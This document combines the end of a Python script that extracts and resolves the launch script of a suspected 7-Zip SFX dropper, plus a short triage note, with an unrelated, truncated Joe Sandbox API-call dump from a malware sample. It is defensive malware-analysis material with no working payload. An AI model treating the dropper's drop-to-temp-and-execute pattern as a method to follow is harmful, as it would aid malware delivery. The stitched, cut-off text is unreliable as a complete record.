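    """Parse Key="value" entries into an ordered (key, value) list; keys may repeat.
    Assumed grammar: whitespace and ';' comments between entries, escapes for
    n, t, backslash and double quote inside values, other backslashes kept."""
    pairs, pos, n = [], 0, len(text)
    while True:
        while pos < n:                      # skip whitespace and ';' comment lines
            if text[pos].isspace():
                pos += 1
            elif text[pos] == ";":
                while pos < n and text[pos] not in "\r\n":
                    pos += 1
            else:
                break
        if pos >= n:
            return pairs
        m = _KEY_RE.match(text, pos)
        if not m:
            raise ValueError(f'expected Key="value" at offset {pos}')
        key, pos, value = m.group(1), m.end(), []
        while True:                         # read the double-quoted value
            if pos >= n:
                raise ValueError(f"unterminated value for {key}")
            ch = text[pos]
            pos += 1
            if ch == '"':
                break
            if ch == "\\" and pos < n and text[pos] in _ESCAPES:
                ch = _ESCAPES[text[pos]]
                pos += 1
            value.append(ch)
        pairs.append((key, "".join(value)))


def resolve_script(pairs, temp_dir, sfx_dir, env=None):
    """Apply SetEnvironment directives in order and expand placeholders.
    Returns (launch actions, final environment). %NAME% is expanded like
    ExpandEnvironmentStringsW: case-insensitive, unknown names left as written."""
    env = {k.upper(): v for k, v in (env or {}).items()}
    actions = []
    for key, value in pairs:
        # %%T / %%S placeholders (assumed: temp folder, SFX folder), then %NAME%
        value = value.replace("%%T", temp_dir).replace("%%S", sfx_dir)
        value = _ENV_RE.sub(lambda m: env.get(m.group(1).upper(), m.group(0)), value)
        if key == "SetEnvironment":
            name, sep, val = value.partition("=")
            if not sep or not name.strip():
                raise ValueError(f"bad SetEnvironment directive: {value!r}")
            env[name.strip().upper()] = val
        elif key in ("RunProgram", "ExecuteFile"):
            actions.append((key, value))
    return actions, env


if __name__ == "__main__":
    script = parse_config(extract_config(SAMPLE_BLOB))
    for action in resolve_script(script, r"C:\Temp\7zS", r"C:\Users\v\Downloads")[0]:
        print(*action)
```

To run it against a real dropper, read the file bytes in place of SAMPLE_BLOB. An empty result from `extract_config` means the file is not an installer-style 7-Zip SFX (or the markers have been altered); a block that parses with a RunProgram pointing into `%%T` is the drop-to-temp-and-execute pattern to pivot on, and the resolved command line is what to look for in process-creation telemetry.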
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(004193C0,00000020,-00000002,-00000004,00405FF0,-00000002,?,?,00000000,0000000A), ref: 00404664
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00404716
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 0040471E
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 0040472D
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00404735
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@$lstrlen
                                                                    • String ID:
                                                                    • API String ID: 2031685711-0
                                                                    • Opcode ID: a45d510ae1538bb769c480bb42da49c1a16301055923b34945e590d69a25caba
                                                                    • Instruction ID: aeb94b40578403fee1b74b38ef18ad41e7f72b790eaa200ba48685626c4261d0
                                                                    • Opcode Fuzzy Hash: a45d510ae1538bb769c480bb42da49c1a16301055923b34945e590d69a25caba
                                                                    • Instruction Fuzzy Hash: 6B214972D00104ABCF216FA0CC019EE77A8EF96355F10443BEA41B72E1F77E4D818648
                                                                    APIs
                                                                      • Part of subcall function 00407A6B: GetSystemMetrics.USER32(0000000B), ref: 00407A93
                                                                      • Part of subcall function 00407A6B: GetSystemMetrics.USER32(0000000C), ref: 00407A9C
                                                                    • GetSystemMetrics.USER32(00000007), ref: 004080B4
                                                                    • GetSystemMetrics.USER32(00000007), ref: 004080C5
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,000004B8,?,?), ref: 0040818C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: MetricsSystem$??3@
                                                                    • String ID: 100%%
                                                                    • API String ID: 2562992111-568723177
                                                                    • Opcode ID: f97ada8ea1c28143f02298183820e063e18118760441c1241ef7ee3e932a0dae
                                                                    • Instruction ID: 0c509f118c308a7c78e08742548c734dda8a0b47b1f593a1d30cecdc3777ed32
                                                                    • Opcode Fuzzy Hash: f97ada8ea1c28143f02298183820e063e18118760441c1241ef7ee3e932a0dae
                                                                    • Instruction Fuzzy Hash: CE31D471A007059FCB24DF65C9459AEB7F4EF40704B00052ED542A72D1DB74FD45CBA9
                                                                    APIs
                                                                      • Part of subcall function 00407C87: GetSystemMetrics.USER32(00000010), ref: 00407CC9
                                                                      • Part of subcall function 00407C87: GetSystemMetrics.USER32(00000011), ref: 00407CD7
                                                                    • wsprintfW.USER32 ref: 00404F19
                                                                    • ??3@YAXPAX@Z.MSVCRT(00405872,00000011,00405872,00000000,004166D0,?), ref: 00404F56
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: MetricsSystem$??3@wsprintf
                                                                    • String ID: %X - %03X - %03X - %03X - %03X$xcA
                                                                    • API String ID: 1174869416-1550840741
                                                                    • Opcode ID: ec52412db155f98f9bae88259a305981963c0d87f79b64e660b9967a4ff67c2f
                                                                    • Instruction ID: 41466d8614d0a23c37c50aec3ef54a83e840c1df2718244856808616b3002f3b
                                                                    • Opcode Fuzzy Hash: ec52412db155f98f9bae88259a305981963c0d87f79b64e660b9967a4ff67c2f
                                                                    • Instruction Fuzzy Hash: F9117F71D44218ABDB15EB90DC56FEDB334BB10B08F10417EEA55361D2DBB86A44CB9C
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(Mg@,00000000,?,00000000,00404262,00000000,00000000,0040674D,?,waitall,00000000,00000000,?,?,00419810), ref: 00404228
                                                                    • lstrlenW.KERNEL32(?,?,?,00419810), ref: 00404231
                                                                    • _wcsnicmp.MSVCRT ref: 0040423D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen$_wcsnicmp
                                                                    • String ID: Mg@
                                                                    • API String ID: 2823567412-3680729969
                                                                    • Opcode ID: ba891c330881e9cd37824329b79c8b3bdedf28b88df0ad5e9eae37b6568f1235
                                                                    • Instruction ID: 9e1626592046255a92b3b8c2eb79444d9ed7104295bc7c238f4b93e2fb8c8d27
                                                                    • Opcode Fuzzy Hash: ba891c330881e9cd37824329b79c8b3bdedf28b88df0ad5e9eae37b6568f1235
                                                                    • Instruction Fuzzy Hash: 09E026726042019BC700CBA5ED84C8B7BECEAC8790B00087BF700E3011E334D8148BB5
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,00406A9D,00000000,?,?), ref: 004023C8
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 004023CF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32
                                                                    • API String ID: 2574300362-3900151262
                                                                    • Opcode ID: cd6f73cecb1163c3412e02ff2c631c42379205c8e465c85e169b66b0ab90bb67
                                                                    • Instruction ID: 50d9489a907287b4f58dec005f8c8a71b0fe89906bae8f062ddf8536b40cf8c2
                                                                    • Opcode Fuzzy Hash: cd6f73cecb1163c3412e02ff2c631c42379205c8e465c85e169b66b0ab90bb67
                                                                    • Instruction Fuzzy Hash: C3D0C970A91700FBDB511FA0EE2DBD636A6EB80B0BF448436E812A00F0C7FC4884CA1C
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32,Wow64DisableWow64FsRedirection,0040243F,?,004069D7,?,00000000,?,?), ref: 004023FA
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00402401
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32
                                                                    • API String ID: 2574300362-736604160
                                                                    • Opcode ID: 3cb0454e562955199366be55c27431b89f07c429e32f9a257932cf547d8e03b3
                                                                    • Instruction ID: 88d9777829bf04cc8710f0dfabc1d7fbda4bae52ffa2c7d5b88ac942ae81d74a
                                                                    • Opcode Fuzzy Hash: 3cb0454e562955199366be55c27431b89f07c429e32f9a257932cf547d8e03b3
                                                                    • Instruction Fuzzy Hash: FFD0C970691600FAD7105FA4DD2DBC639A6AFC0B06F548026A016E00D4C7FC4880861D
                                                                    APIs
                                                                    • _CxxThrowException.MSVCRT(00100EC3,00417010), ref: 0040CD3C
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000004,004193AC,004193AC,00000000,?,0040CE09,00000064,004107AA,004193AC,004032FF,00000000,00000000,004049F2,?,?,?), ref: 0040CD64
                                                                    • memcpy.MSVCRT(00000000,0092AA58,00000004,004193AC,004193AC,00000000,?,0040CE09,00000064,004107AA,004193AC,004032FF,00000000,00000000,004049F2,?), ref: 0040CD8D
                                                                    • ??3@YAXPAX@Z.MSVCRT(0092AA58,004193AC,004193AC,00000000,?,0040CE09,00000064,004107AA,004193AC,004032FF,00000000,00000000,004049F2,?,?,?), ref: 0040CD98
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@??3@ExceptionThrowmemcpy
                                                                    • String ID:
                                                                    • API String ID: 3462485524-0
                                                                    • Opcode ID: 7a43a3fc08f1f35b46db7763ec9cd67e84bfc7e399de81595ed43b4671788ed1
                                                                    • Instruction ID: d1fdfccabdcefd16927407a1053df183a81c89610647dbf5fb7e55cd38556c17
                                                                    • Opcode Fuzzy Hash: 7a43a3fc08f1f35b46db7763ec9cd67e84bfc7e399de81595ed43b4671788ed1
                                                                    • Instruction Fuzzy Hash: 2F11E572200300EBCB289F16D9C0D5BFFE9AF843547108A3FE559A7390D779E98547A8
                                                                    APIs
                                                                      • Part of subcall function 004071BD: GetDlgItem.USER32(?,?), ref: 004071C9
                                                                      • Part of subcall function 004071DA: GetDlgItem.USER32(?,?), ref: 004071E7
                                                                      • Part of subcall function 004071DA: ShowWindow.USER32(00000000,?), ref: 004071FE
                                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00408A64
                                                                    • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000103), ref: 00408A84
                                                                    • GetDlgItem.USER32(?,000004B7), ref: 00408A97
                                                                    • SetWindowLongW.USER32(00000000,000000FC,Function_00007823), ref: 00408AA5
                                                                      • Part of subcall function 004086EB: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,00408AB5), ref: 00408714
                                                                      • Part of subcall function 004086EB: LoadIconW.USER32(00000000), ref: 00408717
                                                                      • Part of subcall function 004086EB: GetSystemMetrics.USER32(00000032), ref: 0040872B
                                                                      • Part of subcall function 004086EB: GetSystemMetrics.USER32(00000031), ref: 00408730
                                                                      • Part of subcall function 004086EB: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,00408AB5), ref: 00408739
                                                                      • Part of subcall function 004086EB: LoadImageW.USER32(00000000), ref: 0040873C
                                                                      • Part of subcall function 004086EB: SendMessageW.USER32(?,00000080,00000001,?), ref: 0040875C
                                                                      • Part of subcall function 004086EB: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408765
                                                                      • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B2), ref: 00408781
                                                                      • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B2), ref: 0040878B
                                                                      • Part of subcall function 004086EB: GetWindowLongW.USER32(?,000000F0), ref: 00408797
                                                                      • Part of subcall function 004086EB: SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087A6
                                                                      • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B5), ref: 004087B4
                                                                      • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B5), ref: 004087C2
                                                                      • Part of subcall function 004086EB: GetWindowLongW.USER32(?,000000F0), ref: 004087CE
                                                                      • Part of subcall function 004086EB: SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087DD
                                                                      • Part of subcall function 00407B90: GetDlgItem.USER32(?,000004B6), ref: 00407B9D
                                                                      • Part of subcall function 00407B90: SetFocus.USER32(00000000,?,?,00407C84,000004B6,?), ref: 00407BA4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: Item$Window$Long$System$HandleLoadMessageMetricsModuleSend$DirectoryFileFocusIconImageInfoShow
                                                                    • String ID:
                                                                    • API String ID: 3043669009-0
                                                                    • Opcode ID: 10e1b547bcbc61deca10da6efc8ae89d0555480e65f43c52d8748ed5732768f8
                                                                    • Instruction ID: 5c7c764d92766e680c666047e1d2b266a9282aef260ce17b2660fed0a98cdec4
                                                                    • Opcode Fuzzy Hash: 10e1b547bcbc61deca10da6efc8ae89d0555480e65f43c52d8748ed5732768f8
                                                                    • Instruction Fuzzy Hash: 62118672E40314ABCB10EBA9DC09FDE77BCEB84714F10446BB652E72D0DAB8A9018B54
                                                                    APIs
                                                                    • SystemParametersInfoW.USER32(00000029,000001F4,?,00000000), ref: 004070C2
                                                                    • GetSystemMetrics.USER32(00000031), ref: 004070E8
                                                                    • CreateFontIndirectW.GDI32(?), ref: 004070F7
                                                                    • DeleteObject.GDI32(00000000), ref: 00407126
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: System$CreateDeleteFontIndirectInfoMetricsObjectParameters
                                                                    • String ID:
                                                                    • API String ID: 1900162674-0
                                                                    • Opcode ID: 10c1999775b064906eaa368cc7bf841ba5ce139f6ebf31b08def3ab2d55476d3
                                                                    • Instruction ID: 550de309380991ebf2cc5542bfcce979d3dc35c4f0fc859f263023f0ef030489
                                                                    • Opcode Fuzzy Hash: 10c1999775b064906eaa368cc7bf841ba5ce139f6ebf31b08def3ab2d55476d3
                                                                    • Instruction Fuzzy Hash: E4112475A00205EFDB109F94DC88BEA77B8EB44300F0081AAE915A7391DB74AD44CF94
                                                                    APIs
                                                                    • ScreenToClient.USER32(?,?), ref: 004085B0
                                                                    • GetClientRect.USER32(?,?), ref: 004085C2
                                                                    • PtInRect.USER32(?,?,?), ref: 004085D1
                                                                      • Part of subcall function 00407FD8: KillTimer.USER32(?,00000001,?,004085E6), ref: 00407FE6
                                                                    • CallNextHookEx.USER32(?,?,?), ref: 004085F3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ClientRect$CallHookKillNextScreenTimer
                                                                    • String ID:
                                                                    • API String ID: 3015594791-0
                                                                    • Opcode ID: 95547b2fb33734e722a1f749a8458f3d385d37bb62c57a358e3a5d7a24cb2da3
                                                                    • Instruction ID: e461164be05bcb912302e6f3c507a6476d35c8a33c6b54d2dcb30444e6ba8619
                                                                    • Opcode Fuzzy Hash: 95547b2fb33734e722a1f749a8458f3d385d37bb62c57a358e3a5d7a24cb2da3
                                                                    • Instruction Fuzzy Hash: 53018732110109EBDB15AF65DE44AEA7BA6BB18340B04803EE946A62A1DB34EC01DB49
                                                                    APIs
                                                                      • Part of subcall function 004030EA: GetWindowTextLengthW.USER32(?), ref: 004030FB
                                                                      • Part of subcall function 004030EA: GetWindowTextW.USER32(t1@,00000000,00000001), ref: 00403118
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00415778,00415780), ref: 00404168
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00415778,00415780), ref: 00404170
                                                                    • SetWindowTextW.USER32(?,?), ref: 0040417D
                                                                    • ??3@YAXPAX@Z.MSVCRT(?), ref: 00404188
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@TextWindow$Length
                                                                    • String ID:
                                                                    • API String ID: 2308334395-0
                                                                    • Opcode ID: bf2f9251983c8e4603f27720dbecbe6c862c4942a19ddc0db16871e0d016537d
                                                                    • Instruction ID: 4b6459f0461bbe798f755719163b862091937496e8852bb980e1e24ac321b0cc
                                                                    • Opcode Fuzzy Hash: bf2f9251983c8e4603f27720dbecbe6c862c4942a19ddc0db16871e0d016537d
                                                                    • Instruction Fuzzy Hash: 88F0FF72D00108BACF01BBA1DD47CDE7B78AF18349F50406AF515721A1EA359B959B98
                                                                    APIs
                                                                    • GetObjectW.GDI32(?,0000005C,?), ref: 00407931
                                                                    • CreateFontIndirectW.GDI32(?), ref: 00407947
                                                                    • GetDlgItem.USER32(?,000004B5), ref: 0040795B
                                                                    • SendMessageW.USER32(00000000,00000030,00000000,00000000), ref: 00407967
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFontIndirectItemMessageObjectSend
                                                                    • String ID:
                                                                    • API String ID: 2001801573-0
                                                                    • Opcode ID: bf1836fc2c99b432ae984c5376e55d25bfda714a933e933cbe8faf723434fd17
                                                                    • Instruction ID: 7a034716ce128e2868931ba3036e49d2ca07d686104c333d304994eb71a954cf
                                                                    • Opcode Fuzzy Hash: bf1836fc2c99b432ae984c5376e55d25bfda714a933e933cbe8faf723434fd17
                                                                    • Instruction Fuzzy Hash: B4F05476900704EBE7205BA4DD49FCB7BADAB88B01F108135F911F52D4DBB4E4018B69
                                                                    APIs
                                                                    • GetParent.USER32(?), ref: 00401D92
                                                                    • GetWindowRect.USER32(?,?), ref: 00401DAB
                                                                    • ScreenToClient.USER32(00000000,?), ref: 00401DB9
                                                                    • ScreenToClient.USER32(00000000,?), ref: 00401DC0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ClientScreen$ParentRectWindow
                                                                    • String ID:
                                                                    • API String ID: 2099118873-0
                                                                    • Opcode ID: 373e5a3a3c618f7341f086d59bc570b4278045b0fb2d4c8362c44c34085ab298
                                                                    • Instruction ID: c9a7d6158b24b89f480d793c87918ffc8905022d7cd2aff0562fad3402b16060
                                                                    • Opcode Fuzzy Hash: 373e5a3a3c618f7341f086d59bc570b4278045b0fb2d4c8362c44c34085ab298
                                                                    • Instruction Fuzzy Hash: 6BE08C73604226ABD7109BA6FC88CCBBFADEFD5762700447AF945A2220C7349C109AB5
                                                                    APIs
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,00000000), ref: 0041212C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@
                                                                    • String ID: (nA${D@
                                                                    • API String ID: 613200358-2741945119
                                                                    • Opcode ID: 1e0df42129a71c755aa499faf77b433d37237b934c8390ca0221971e75c2e4af
                                                                    • Instruction ID: 2f127b0a99b440bb22087229e66332d50aa0d3dd2037016e8eed2c3918cb49fd
                                                                    • Opcode Fuzzy Hash: 1e0df42129a71c755aa499faf77b433d37237b934c8390ca0221971e75c2e4af
                                                                    • Instruction Fuzzy Hash: 8C222771900248DFCB24EF65C9909EEBBB5FF08304F50452FE92A97261DB78A995CF48
                                                                    APIs
                                                                      • Part of subcall function 0041156F: ??2@YAPAXI@Z.MSVCRT(0000000C,000000FF,00411D35,00416DD8,00000001,?,?,00000000), ref: 00411574
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,00416DD8,00000001,?,?,00000000), ref: 00411D36
                                                                      • Part of subcall function 0040E036: ??2@YAPAXI@Z.MSVCRT(?,?,?,?,00410D1B,00010000), ref: 0040E049
                                                                      • Part of subcall function 0040E036: memmove.MSVCRT(00000000,?,?,?,?,?,00410D1B,00010000), ref: 0040E063
                                                                      • Part of subcall function 0040E036: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00410D1B,00010000), ref: 0040E073
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00416DD8,00000001,?,?,00000000), ref: 00411D6E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@$??3@$memmove
                                                                    • String ID: {D@
                                                                    • API String ID: 4294387087-1160549682
                                                                    • Opcode ID: 006456e1978721f3553438c475323fd4f4958cf9040aa5a49b28c9fd5e78c511
